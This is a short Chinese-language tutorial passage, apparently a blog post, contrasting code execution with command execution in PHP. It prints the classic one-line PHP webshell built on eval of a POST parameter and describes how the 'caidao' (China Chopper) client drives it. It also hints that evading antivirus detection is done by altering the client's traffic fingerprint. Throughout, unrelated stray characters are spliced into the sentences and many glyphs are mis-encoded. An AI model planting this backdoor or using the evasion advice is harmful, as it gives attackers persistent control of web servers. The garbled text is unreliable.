0x01:代碼執(zhí)行和命令執(zhí)行的區(qū)別垛耳?
- 命令執(zhí)行是指系統(tǒng)cmd或者shell命令的執(zhí)行躺酒,代碼執(zhí)行是指php代碼執(zhí)行函數(shù)eval、assert等
0x02:經(jīng)典實(shí)例–>菜刀耳舅、一句話
- php一句話:
<?php eval($_POST['pass']);?>
// 等價(jià)于
<?php
$code = $_POST['pass'];
eval($code);
?>
- 菜刀的原理也就是給參數(shù)abc賦不同的值來執(zhí)行命令,也就是得到webshell倚评。
- 可以通過抓包來分析菜刀傳遞的命令浦徊,如果自己想搞免殺,則需要修改菜刀的指紋天梧,即修改發(fā)送的命令包盔性。
歡迎關(guān)注微信公眾號(coder0x00)或掃描下方二維碼關(guān)注,我們將持續(xù)搜尋程序員必備基礎(chǔ)技能包提供給大家呢岗。